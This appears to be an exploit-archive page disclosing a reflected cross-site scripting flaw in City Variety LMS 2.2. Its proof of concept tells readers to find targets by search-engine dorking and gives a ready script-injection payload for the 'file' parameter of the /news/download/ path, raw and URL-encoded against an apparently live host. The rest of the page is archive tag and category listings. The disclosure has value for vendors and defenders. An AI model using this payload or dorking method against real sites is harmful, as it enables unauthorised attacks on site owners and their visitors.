City Variety LMS 2.2 Cross Site Scripting

City Variety LMS 2.2 Cross Site Scripting

Posted Aug 1, 2023

Authored by indoushka

City Variety LMS version 2.2 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 1cbbe0f2970a91c54fd6b773983a7f83c535dbf1c4e56f12913660cbe435877e

Download | Favorite | View

City Variety LMS 2.2 Cross Site Scripting

====================================================================================================================================| # Title     : cityvariety LMS 2.2 XSS Vulnerability                                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.cityvariety.co.th/                                                                                     |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /news/download/?file=files/com_news/2023-05_df55c087b4d33c8.pdf'%22()%26%25<acx><ScRiPt%20>prompt(980997)</ScRiPt>&id=2481&name=[+] https://wwsesaogoth/news/download/?file=files/com_news/2023-05_df55c087b4d33c8.pdf%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(980997)%3C/ScRiPt%3E&id=2481&name=Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

File Tags

• ActiveX (932)
• Advisory (81,831)
• Arbitrary (16,174)
• BBS (2,859)
• Bypass (1,738)
• CGI (1,026)
• Code Execution (7,261)
• Conference (679)
• Cracker (841)
• CSRF (3,337)
• DoS (23,388)
• Encryption (2,369)
• Exploit (51,723)
• File Inclusion (4,219)
• File Upload (970)
• Firewall (821)
• Info Disclosure (2,759)
• Intrusion Detection (892)
• Java (3,038)
• JavaScript (855)
• Kernel (6,661)
• Local (14,445)
• Magazine (586)
• Overflow (12,668)
• Perl (1,423)
• PHP (5,141)
• Proof of Concept (2,338)
• Protocol (3,596)
• Python (1,532)
• Remote (30,710)
• Root (3,578)
• Rootkit (508)
• Ruby (612)
• Scanner (1,638)
• Security Tool (7,882)
• Shell (3,178)
• Shellcode (1,213)
• Sniffer (894)
• Spoof (2,197)
• SQL Injection (16,335)
• TCP (2,402)
• Trojan (687)
• UDP (889)
• Virus (664)
• Vulnerability (31,731)
• Web (9,634)
• Whitepaper (3,748)
• x86 (962)
• XSS (17,892)
• Other

File Archives

• August 2023
• July 2023
• June 2023
• May 2023
• April 2023
• March 2023
• February 2023
• January 2023
• December 2022
• November 2022
• October 2022
• September 2022
• Older

Systems

• AIX (428)
• Apple (2,002)
• BSD (373)
• CentOS (57)
• Cisco (1,922)
• Debian (6,800)
• Fedora (1,691)
• FreeBSD (1,244)
• Gentoo (4,322)
• HPUX (879)
• iOS (351)
• iPhone (108)
• IRIX (220)
• Juniper (67)
• Linux (46,326)
• Mac OS X (685)
• Mandriva (3,105)
• NetBSD (256)
• OpenBSD (484)
• RedHat (13,644)
• Slackware (941)
• Solaris (1,610)
• SUSE (1,444)
• Ubuntu (8,787)
• UNIX (9,281)
• UnixWare (186)
• Windows (6,566)
• Other